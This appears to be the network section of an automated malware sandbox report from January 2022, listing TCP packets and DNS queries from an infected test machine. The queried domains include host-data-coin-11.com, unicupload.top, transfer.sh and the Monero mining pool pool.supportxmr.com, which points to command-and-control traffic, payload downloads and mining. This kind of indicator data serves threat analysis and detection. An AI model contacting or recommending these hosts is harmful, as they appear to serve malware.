                                                                                                                                                                                            Jan 14, 2022 12:29:11.840742111 CET80497788.209.70.0192.168.2.4
                                                                                                                                                                                            Jan 14, 2022 12:29:11.840759993 CET80497788.209.70.0192.168.2.4
                                                                                                                                                                                            Jan 14, 2022 12:29:11.953190088 CET80497788.209.70.0192.168.2.4
                                                                                                                                                                                            Jan 14, 2022 12:29:11.953313112 CET4977880192.168.2.48.209.70.0
                                                                                                                                                                                            Jan 14, 2022 12:29:11.954265118 CET4977880192.168.2.48.209.70.0
                                                                                                                                                                                            Jan 14, 2022 12:29:11.974081993 CET80497788.209.70.0192.168.2.4
                                                                                                                                                                                            Jan 14, 2022 12:29:12.275722980 CET4977980192.168.2.48.209.70.0
                                                                                                                                                                                            Jan 14, 2022 12:29:12.293191910 CET80497798.209.70.0192.168.2.4
                                                                                                                                                                                            Jan 14, 2022 12:29:12.293441057 CET4977980192.168.2.48.209.70.0
                                                                                                                                                                                            Jan 14, 2022 12:29:12.293633938 CET4977980192.168.2.48.209.70.0
                                                                                                                                                                                            Jan 14, 2022 12:29:12.293658972 CET4977980192.168.2.48.209.70.0
                                                                                                                                                                                            Jan 14, 2022 12:29:12.310903072 CET80497798.209.70.0192.168.2.4
                                                                                                                                                                                            Jan 14, 2022 12:29:12.418447971 CET80497798.209.70.0192.168.2.4
                                                                                                                                                                                            Jan 14, 2022 12:29:12.418611050 CET4977980192.168.2.48.209.70.0
                                                                                                                                                                                            Jan 14, 2022 12:29:12.419019938 CET4977980192.168.2.48.209.70.0
                                                                                                                                                                                            Jan 14, 2022 12:29:12.436286926 CET80497798.209.70.0192.168.2.4
                                                                                                                                                                                            Jan 14, 2022 12:29:12.451116085 CET4978080192.168.2.48.209.70.0
                                                                                                                                                                                            Jan 14, 2022 12:29:12.468374014 CET80497808.209.70.0192.168.2.4
                                                                                                                                                                                            Jan 14, 2022 12:29:12.468473911 CET4978080192.168.2.48.209.70.0
                                                                                                                                                                                            Jan 14, 2022 12:29:12.468575954 CET4978080192.168.2.48.209.70.0
                                                                                                                                                                                            Jan 14, 2022 12:29:12.468583107 CET4978080192.168.2.48.209.70.0
                                                                                                                                                                                            Jan 14, 2022 12:29:12.485862970 CET80497808.209.70.0192.168.2.4
                                                                                                                                                                                            Jan 14, 2022 12:29:12.587656975 CET80497808.209.70.0192.168.2.4
                                                                                                                                                                                            Jan 14, 2022 12:29:12.587778091 CET4978080192.168.2.48.209.70.0
                                                                                                                                                                                            Jan 14, 2022 12:29:12.588223934 CET4978080192.168.2.48.209.70.0
                                                                                                                                                                                            Jan 14, 2022 12:29:12.605377913 CET80497808.209.70.0192.168.2.4
                                                                                                                                                                                            Jan 14, 2022 12:29:12.944576025 CET4978180192.168.2.48.209.70.0
                                                                                                                                                                                            Jan 14, 2022 12:29:12.961906910 CET80497818.209.70.0192.168.2.4
                                                                                                                                                                                            Jan 14, 2022 12:29:12.961988926 CET4978180192.168.2.48.209.70.0
                                                                                                                                                                                            Jan 14, 2022 12:29:12.962191105 CET4978180192.168.2.48.209.70.0
                                                                                                                                                                                            Jan 14, 2022 12:29:12.962208986 CET4978180192.168.2.48.209.70.0
                                                                                                                                                                                            Jan 14, 2022 12:29:12.979243994 CET80497818.209.70.0192.168.2.4
                                                                                                                                                                                            Jan 14, 2022 12:29:13.081617117 CET80497818.209.70.0192.168.2.4
                                                                                                                                                                                            Jan 14, 2022 12:29:13.081634998 CET80497818.209.70.0192.168.2.4
                                                                                                                                                                                            Jan 14, 2022 12:29:13.081702948 CET4978180192.168.2.48.209.70.0
                                                                                                                                                                                            Jan 14, 2022 12:29:13.082015038 CET4978180192.168.2.48.209.70.0
                                                                                                                                                                                            Jan 14, 2022 12:29:13.099102020 CET80497818.209.70.0192.168.2.4
                                                                                                                                                                                            Jan 14, 2022 12:29:13.412636995 CET4978280192.168.2.48.209.70.0
                                                                                                                                                                                            Jan 14, 2022 12:29:13.429912090 CET80497828.209.70.0192.168.2.4
                                                                                                                                                                                            Jan 14, 2022 12:29:13.430025101 CET4978280192.168.2.48.209.70.0
                                                                                                                                                                                            Jan 14, 2022 12:29:13.430151939 CET4978280192.168.2.48.209.70.0
                                                                                                                                                                                            Jan 14, 2022 12:29:13.430171967 CET4978280192.168.2.48.209.70.0
                                                                                                                                                                                            Jan 14, 2022 12:29:13.447305918 CET80497828.209.70.0192.168.2.4
                                                                                                                                                                                            Jan 14, 2022 12:29:13.554048061 CET80497828.209.70.0192.168.2.4
                                                                                                                                                                                            Jan 14, 2022 12:29:13.554451942 CET4978280192.168.2.48.209.70.0
                                                                                                                                                                                            Jan 14, 2022 12:29:13.554469109 CET4978280192.168.2.48.209.70.0
                                                                                                                                                                                            Jan 14, 2022 12:29:13.571698904 CET80497828.209.70.0192.168.2.4
                                                                                                                                                                                            Jan 14, 2022 12:29:13.584171057 CET4978380192.168.2.48.209.70.0
                                                                                                                                                                                            Jan 14, 2022 12:29:13.601548910 CET80497838.209.70.0192.168.2.4
                                                                                                                                                                                            Jan 14, 2022 12:29:13.602407932 CET4978380192.168.2.48.209.70.0
                                                                                                                                                                                            Jan 14, 2022 12:29:13.602489948 CET4978380192.168.2.48.209.70.0
                                                                                                                                                                                            Jan 14, 2022 12:29:13.602504015 CET4978380192.168.2.48.209.70.0
                                                                                                                                                                                            Jan 14, 2022 12:29:13.619770050 CET80497838.209.70.0192.168.2.4
                                                                                                                                                                                            Jan 14, 2022 12:29:13.726735115 CET80497838.209.70.0192.168.2.4
                                                                                                                                                                                            Jan 14, 2022 12:29:13.727262974 CET4978380192.168.2.48.209.70.0
                                                                                                                                                                                            Jan 14, 2022 12:29:13.727483988 CET4978380192.168.2.48.209.70.0
                                                                                                                                                                                            Jan 14, 2022 12:29:13.735378981 CET4978480192.168.2.4185.186.142.166
                                                                                                                                                                                            Jan 14, 2022 12:29:13.744626045 CET80497838.209.70.0192.168.2.4
                                                                                                                                                                                            Jan 14, 2022 12:29:13.791928053 CET8049784185.186.142.166192.168.2.4
                                                                                                                                                                                            Jan 14, 2022 12:29:14.302527905 CET4978480192.168.2.4185.186.142.166
                                                                                                                                                                                            Jan 14, 2022 12:29:14.359100103 CET8049784185.186.142.166192.168.2.4
                                                                                                                                                                                            Jan 14, 2022 12:29:14.865107059 CET4978480192.168.2.4185.186.142.166
                                                                                                                                                                                            Jan 14, 2022 12:29:14.921706915 CET8049784185.186.142.166192.168.2.4
                                                                                                                                                                                            Jan 14, 2022 12:29:15.262820005 CET4978580192.168.2.48.209.70.0
                                                                                                                                                                                            Jan 14, 2022 12:29:15.280236959 CET80497858.209.70.0192.168.2.4
                                                                                                                                                                                            Jan 14, 2022 12:29:15.280334949 CET4978580192.168.2.48.209.70.0
                                                                                                                                                                                            Jan 14, 2022 12:29:15.280463934 CET4978580192.168.2.48.209.70.0
                                                                                                                                                                                            Jan 14, 2022 12:29:15.280479908 CET4978580192.168.2.48.209.70.0
                                                                                                                                                                                            Jan 14, 2022 12:29:15.297588110 CET80497858.209.70.0192.168.2.4
                                                                                                                                                                                            Jan 14, 2022 12:29:15.419229031 CET80497858.209.70.0192.168.2.4
                                                                                                                                                                                            Jan 14, 2022 12:29:15.419337034 CET4978580192.168.2.48.209.70.0
                                                                                                                                                                                            Jan 14, 2022 12:29:15.419637918 CET4978580192.168.2.48.209.70.0
                                                                                                                                                                                            Jan 14, 2022 12:29:15.436743975 CET80497858.209.70.0192.168.2.4
                                                                                                                                                                                            Jan 14, 2022 12:29:15.447879076 CET4978680192.168.2.48.209.70.0
                                                                                                                                                                                            Jan 14, 2022 12:29:15.465063095 CET80497868.209.70.0192.168.2.4
                                                                                                                                                                                            Jan 14, 2022 12:29:15.465157032 CET4978680192.168.2.48.209.70.0
                                                                                                                                                                                            Jan 14, 2022 12:29:15.465264082 CET4978680192.168.2.48.209.70.0
                                                                                                                                                                                            Jan 14, 2022 12:29:15.465290070 CET4978680192.168.2.48.209.70.0
                                                                                                                                                                                            Jan 14, 2022 12:29:15.482394934 CET80497868.209.70.0192.168.2.4
                                                                                                                                                                                            Jan 14, 2022 12:29:15.582700014 CET80497868.209.70.0192.168.2.4
                                                                                                                                                                                            Jan 14, 2022 12:29:15.582720041 CET80497868.209.70.0192.168.2.4
                                                                                                                                                                                            Jan 14, 2022 12:29:15.582781076 CET4978680192.168.2.48.209.70.0
                                                                                                                                                                                            Jan 14, 2022 12:29:15.583050013 CET4978680192.168.2.48.209.70.0
                                                                                                                                                                                            Jan 14, 2022 12:29:15.600171089 CET80497868.209.70.0192.168.2.4
                                                                                                                                                                                            Jan 14, 2022 12:29:15.881963968 CET4978780192.168.2.48.209.70.0
                                                                                                                                                                                            Jan 14, 2022 12:29:15.899432898 CET80497878.209.70.0192.168.2.4
                                                                                                                                                                                            Jan 14, 2022 12:29:15.899548054 CET4978780192.168.2.48.209.70.0
                                                                                                                                                                                            Jan 14, 2022 12:29:15.899692059 CET4978780192.168.2.48.209.70.0
                                                                                                                                                                                            Jan 14, 2022 12:29:15.957561970 CET80497878.209.70.0192.168.2.4
                                                                                                                                                                                            Jan 14, 2022 12:29:16.000572920 CET80497878.209.70.0192.168.2.4
                                                                                                                                                                                            Jan 14, 2022 12:29:16.000614882 CET80497878.209.70.0192.168.2.4
                                                                                                                                                                                            Jan 14, 2022 12:29:16.000653028 CET80497878.209.70.0192.168.2.4
                                                                                                                                                                                            Jan 14, 2022 12:29:16.000673056 CET4978780192.168.2.48.209.70.0
                                                                                                                                                                                            Jan 14, 2022 12:29:16.000693083 CET80497878.209.70.0192.168.2.4
                                                                                                                                                                                            Jan 14, 2022 12:29:16.000731945 CET80497878.209.70.0192.168.2.4

                                                                                                                                                                                            DNS Queries

                                                                                                                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                                                                            Jan 14, 2022 12:29:11.782485008 CET192.168.2.48.8.8.80x67b5Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                            Jan 14, 2022 12:29:11.963017941 CET192.168.2.48.8.8.80xe986Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                            Jan 14, 2022 12:29:12.430608034 CET192.168.2.48.8.8.80x5bf4Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                            Jan 14, 2022 12:29:12.606929064 CET192.168.2.48.8.8.80x4112Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                            Jan 14, 2022 12:29:13.093177080 CET192.168.2.48.8.8.80xc21bStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                            Jan 14, 2022 12:29:13.564027071 CET192.168.2.48.8.8.80x8bf6Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                            Jan 14, 2022 12:29:14.948347092 CET192.168.2.48.8.8.80xa91dStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                            Jan 14, 2022 12:29:15.427823067 CET192.168.2.48.8.8.80xc66aStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                            Jan 14, 2022 12:29:15.594754934 CET192.168.2.48.8.8.80xad10Standard query (0)data-host-coin-8.comA (IP address)IN (0x0001)
                                                                                                                                                                                            Jan 14, 2022 12:29:17.681981087 CET192.168.2.48.8.8.80xd6aeStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                            Jan 14, 2022 12:29:17.868205070 CET192.168.2.48.8.8.80xd89aStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                            Jan 14, 2022 12:29:18.034226894 CET192.168.2.48.8.8.80x5ee7Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                            Jan 14, 2022 12:29:18.336664915 CET192.168.2.48.8.8.80x54cbStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                            Jan 14, 2022 12:29:18.505330086 CET192.168.2.48.8.8.80x89d2Standard query (0)privacy-tools-for-you-780.comA (IP address)IN (0x0001)
                                                                                                                                                                                            Jan 14, 2022 12:29:20.346779108 CET192.168.2.48.8.8.80x6d1fStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                            Jan 14, 2022 12:29:20.801031113 CET192.168.2.48.8.8.80x68bbStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                            Jan 14, 2022 12:29:20.967899084 CET192.168.2.48.8.8.80x3931Standard query (0)unicupload.topA (IP address)IN (0x0001)
                                                                                                                                                                                            Jan 14, 2022 12:29:21.120146990 CET192.168.2.48.8.8.80x1d8bStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                            Jan 14, 2022 12:29:21.315474033 CET192.168.2.48.8.8.80x44e5Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                            Jan 14, 2022 12:29:21.504046917 CET192.168.2.48.8.8.80x25c0Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                            Jan 14, 2022 12:29:21.694421053 CET192.168.2.48.8.8.80x639bStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                            Jan 14, 2022 12:29:22.180890083 CET192.168.2.48.8.8.80x33a6Standard query (0)data-host-coin-8.comA (IP address)IN (0x0001)
                                                                                                                                                                                            Jan 14, 2022 12:29:25.771519899 CET192.168.2.48.8.8.80xed2cStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                            Jan 14, 2022 12:29:25.937843084 CET192.168.2.48.8.8.80x2715Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                            Jan 14, 2022 12:29:26.102307081 CET192.168.2.48.8.8.80x143dStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                            Jan 14, 2022 12:29:26.315789938 CET192.168.2.48.8.8.80x734eStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                            Jan 14, 2022 12:29:29.117929935 CET192.168.2.48.8.8.80x33caStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                            Jan 14, 2022 12:29:29.293498993 CET192.168.2.48.8.8.80xdcf4Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                            Jan 14, 2022 12:29:29.473170996 CET192.168.2.48.8.8.80xd6f7Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                            Jan 14, 2022 12:29:29.656965017 CET192.168.2.48.8.8.80xb971Standard query (0)cdn.discordapp.comA (IP address)IN (0x0001)
                                                                                                                                                                                            Jan 14, 2022 12:29:31.224777937 CET192.168.2.48.8.8.80x521dStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                            Jan 14, 2022 12:29:31.394221067 CET192.168.2.48.8.8.80x49bfStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                            Jan 14, 2022 12:29:31.562335968 CET192.168.2.48.8.8.80x2eb3Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                            Jan 14, 2022 12:29:41.890839100 CET192.168.2.48.8.8.80x87cbStandard query (0)microsoft-com.mail.protection.outlook.comA (IP address)IN (0x0001)
                                                                                                                                                                                            Jan 14, 2022 12:29:44.528678894 CET192.168.2.48.8.8.80x1a68Standard query (0)patmushta.infoA (IP address)IN (0x0001)
                                                                                                                                                                                            Jan 14, 2022 12:29:53.201407909 CET192.168.2.48.8.8.80xdaf0Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                            Jan 14, 2022 12:29:53.367465973 CET192.168.2.48.8.8.80x5b4cStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                            Jan 14, 2022 12:29:53.557280064 CET192.168.2.48.8.8.80x4a7cStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                            Jan 14, 2022 12:29:53.736764908 CET192.168.2.48.8.8.80x9d7eStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                            Jan 14, 2022 12:29:53.901665926 CET192.168.2.48.8.8.80x17caStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                            Jan 14, 2022 12:29:54.067249060 CET192.168.2.48.8.8.80xb79fStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                            Jan 14, 2022 12:29:54.283118010 CET192.168.2.48.8.8.80x5c2fStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                            Jan 14, 2022 12:29:54.452543020 CET192.168.2.48.8.8.80x3d2fStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                            Jan 14, 2022 12:29:54.619712114 CET192.168.2.48.8.8.80x4f2bStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                            Jan 14, 2022 12:29:54.798546076 CET192.168.2.48.8.8.80x4e70Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                            Jan 14, 2022 12:29:54.966861963 CET192.168.2.48.8.8.80x25a4Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                            Jan 14, 2022 12:29:55.145189047 CET192.168.2.48.8.8.80x8dccStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                            Jan 14, 2022 12:29:55.398905993 CET192.168.2.48.8.8.80xff6aStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                            Jan 14, 2022 12:29:55.566248894 CET192.168.2.48.8.8.80xa5dfStandard query (0)data-host-coin-8.comA (IP address)IN (0x0001)
                                                                                                                                                                                            Jan 14, 2022 12:29:58.441070080 CET192.168.2.48.8.8.80x648dStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                            Jan 14, 2022 12:29:58.609729052 CET192.168.2.48.8.8.80xd308Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                            Jan 14, 2022 12:29:58.783494949 CET192.168.2.48.8.8.80x8226Standard query (0)goo.suA (IP address)IN (0x0001)
                                                                                                                                                                                            Jan 14, 2022 12:29:59.128232002 CET192.168.2.48.8.8.80x8d36Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                            Jan 14, 2022 12:29:59.305922985 CET192.168.2.48.8.8.80xb0Standard query (0)transfer.shA (IP address)IN (0x0001)
                                                                                                                                                                                            Jan 14, 2022 12:29:59.700192928 CET192.168.2.48.8.8.80xf035Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                            Jan 14, 2022 12:30:00.035913944 CET192.168.2.48.8.8.80xb9a8Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                            Jan 14, 2022 12:30:00.674380064 CET192.168.2.48.8.8.80x336Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                            Jan 14, 2022 12:30:00.959358931 CET192.168.2.48.8.8.80x61eStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                            Jan 14, 2022 12:30:01.321439981 CET192.168.2.48.8.8.80xf3f6Standard query (0)data-host-coin-8.comA (IP address)IN (0x0001)
                                                                                                                                                                                            Jan 14, 2022 12:30:04.139807940 CET192.168.2.48.8.8.80x82edStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                            Jan 14, 2022 12:30:04.312947989 CET192.168.2.48.8.8.80x43d2Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                            Jan 14, 2022 12:30:04.526979923 CET192.168.2.48.8.8.80x4cb4Standard query (0)transfer.shA (IP address)IN (0x0001)
                                                                                                                                                                                            Jan 14, 2022 12:30:07.377934933 CET192.168.2.48.8.8.80x7c19Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                            Jan 14, 2022 12:30:07.559844971 CET192.168.2.48.8.8.80x3d62Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                            Jan 14, 2022 12:30:07.735255957 CET192.168.2.48.8.8.80x7946Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                            Jan 14, 2022 12:30:07.912570953 CET192.168.2.48.8.8.80x5623Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                            Jan 14, 2022 12:30:08.140345097 CET192.168.2.48.8.8.80x598Standard query (0)transfer.shA (IP address)IN (0x0001)
                                                                                                                                                                                            Jan 14, 2022 12:30:11.223495007 CET192.168.2.48.8.8.80xfd8cStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                            Jan 14, 2022 12:30:11.397445917 CET192.168.2.48.8.8.80x30acStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                            Jan 14, 2022 12:30:11.563966036 CET192.168.2.48.8.8.80x5efbStandard query (0)data-host-coin-8.comA (IP address)IN (0x0001)
                                                                                                                                                                                            Jan 14, 2022 12:30:13.492192030 CET192.168.2.48.8.8.80xf3c6Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                            Jan 14, 2022 12:30:13.665873051 CET192.168.2.48.8.8.80xbbfeStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                            Jan 14, 2022 12:30:13.852792025 CET192.168.2.48.8.8.80xfa1fStandard query (0)data-host-coin-8.comA (IP address)IN (0x0001)
                                                                                                                                                                                            Jan 14, 2022 12:30:15.926599026 CET192.168.2.48.8.8.80xe24aStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                            Jan 14, 2022 12:30:16.141427994 CET192.168.2.48.8.8.80xa604Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                            Jan 14, 2022 12:30:21.652688026 CET192.168.2.48.8.8.80x8116Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                            Jan 14, 2022 12:30:21.847970009 CET192.168.2.48.8.8.80x6d9bStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                            Jan 14, 2022 12:30:22.201057911 CET192.168.2.48.8.8.80x510Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                            Jan 14, 2022 12:30:25.474335909 CET192.168.2.48.8.8.80xb7b6Standard query (0)patmushta.infoA (IP address)IN (0x0001)
                                                                                                                                                                                            Jan 14, 2022 12:30:48.699079037 CET192.168.2.48.8.8.80xab12Standard query (0)pool.supportxmr.comA (IP address)IN (0x0001)
                                                                                                                                                                                            Jan 14, 2022 12:31:16.120827913 CET192.168.2.48.8.8.80x58e1Standard query (0)patmushta.infoA (IP address)IN (0x0001)
                                                                                                                                                                                            Jan 14, 2022 12:31:38.487710953 CET192.168.2.48.8.8.80xdeb8Standard query (0)microsoft-com.mail.protection.outlook.comA (IP address)IN (0x0001)

                                                                                                                                                                                            DNS Answers

                                                                                                                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                                                                            Jan 14, 2022 12:29:11.800079107 CET8.8.8.8192.168.2.40x67b5No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                                                                                            Jan 14, 2022 12:29:12.274777889 CET8.8.8.8192.168.2.40xe986No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                                                                                            Jan 14, 2022 12:29:12.450135946 CET8.8.8.8192.168.2.40x5bf4No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                                                                                            Jan 14, 2022 12:29:12.944006920 CET8.8.8.8192.168.2.40x4112No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                                                                                            Jan 14, 2022 12:29:13.409914970 CET8.8.8.8192.168.2.40xc21bNo error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                                                                                            Jan 14, 2022 12:29:13.583471060 CET8.8.8.8192.168.2.40x8bf6No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                                                                                            Jan 14, 2022 12:29:15.262034893 CET8.8.8.8192.168.2.40xa91dNo error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                                                                                            Jan 14, 2022 12:29:15.447199106 CET8.8.8.8192.168.2.40xc66aNo error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                                                                                            Jan 14, 2022 12:29:15.881325006 CET8.8.8.8192.168.2.40xad10No error (0)data-host-coin-8.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                                                                                            Jan 14, 2022 12:29:17.699449062 CET8.8.8.8192.168.2.40xd6aeNo error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                                                                                            Jan 14, 2022 12:29:17.887447119 CET8.8.8.8192.168.2.40xd89aNo error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                                                                                            Jan 14, 2022 12:29:18.053019047 CET8.8.8.8192.168.2.40x5ee7No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                                                                                            Jan 14, 2022 12:29:18.355922937 CET8.8.8.8192.168.2.40x54cbNo error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                                                                                            Jan 14, 2022 12:29:18.790898085 CET8.8.8.8192.168.2.40x89d2No error (0)privacy-tools-for-you-780.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                                                                                            Jan 14, 2022 12:29:20.656292915 CET8.8.8.8192.168.2.40x6d1fNo error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                                                                                            Jan 14, 2022 12:29:20.820332050 CET8.8.8.8192.168.2.40x68bbNo error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                                                                                            Jan 14, 2022 12:29:21.072279930 CET8.8.8.8192.168.2.40x3931No error (0)unicupload.top54.38.220.85A (IP address)IN (0x0001)
                                                                                                                                                                                            Jan 14, 2022 12:29:21.139534950 CET8.8.8.8192.168.2.40x1d8bNo error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                                                                                            Jan 14, 2022 12:29:21.334872007 CET8.8.8.8192.168.2.40x44e5No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                                                                                            Jan 14, 2022 12:29:21.523125887 CET8.8.8.8192.168.2.40x25c0No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                                                                                            Jan 14, 2022 12:29:21.983006954 CET8.8.8.8192.168.2.40x639bNo error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                                                                                            Jan 14, 2022 12:29:22.472062111 CET8.8.8.8192.168.2.40x33a6No error (0)data-host-coin-8.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                                                                                            Jan 14, 2022 12:29:25.790760994 CET8.8.8.8192.168.2.40xed2cNo error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                                                                                            Jan 14, 2022 12:29:25.954900026 CET8.8.8.8192.168.2.40x2715No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                                                                                            Jan 14, 2022 12:29:26.121053934 CET8.8.8.8192.168.2.40x143dNo error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                                                                                            Jan 14, 2022 12:29:26.332964897 CET8.8.8.8192.168.2.40x734eNo error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                                                                                            Jan 14, 2022 12:29:29.135415077 CET8.8.8.8192.168.2.40x33caNo error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                                                                                            Jan 14, 2022 12:29:29.312202930 CET8.8.8.8192.168.2.40xdcf4No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                                                                                            Jan 14, 2022 12:29:29.490415096 CET8.8.8.8192.168.2.40xd6f7No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                                                                                            Jan 14, 2022 12:29:29.678015947 CET8.8.8.8192.168.2.40xb971No error (0)cdn.discordapp.com162.159.135.233A (IP address)IN (0x0001)
                                                                                                                                                                                            Jan 14, 2022 12:29:29.678015947 CET8.8.8.8192.168.2.40xb971No error (0)cdn.discordapp.com162.159.134.233A (IP address)IN (0x0001)
                                                                                                                                                                                            Jan 14, 2022 12:29:29.678015947 CET8.8.8.8192.168.2.40xb971No error (0)cdn.discordapp.com162.159.133.233A (IP address)IN (0x0001)
                                                                                                                                                                                            Jan 14, 2022 12:29:29.678015947 CET8.8.8.8192.168.2.40xb971No error (0)cdn.discordapp.com162.159.130.233A (IP address)IN (0x0001)
                                                                                                                                                                                            Jan 14, 2022 12:29:29.678015947 CET8.8.8.8192.168.2.40xb971No error (0)cdn.discordapp.com162.159.129.233A (IP address)IN (0x0001)
                                                                                                                                                                                            Jan 14, 2022 12:29:31.244934082 CET8.8.8.8192.168.2.40x521dNo error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                                                                                            Jan 14, 2022 12:29:31.414046049 CET8.8.8.8192.168.2.40x49bfNo error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
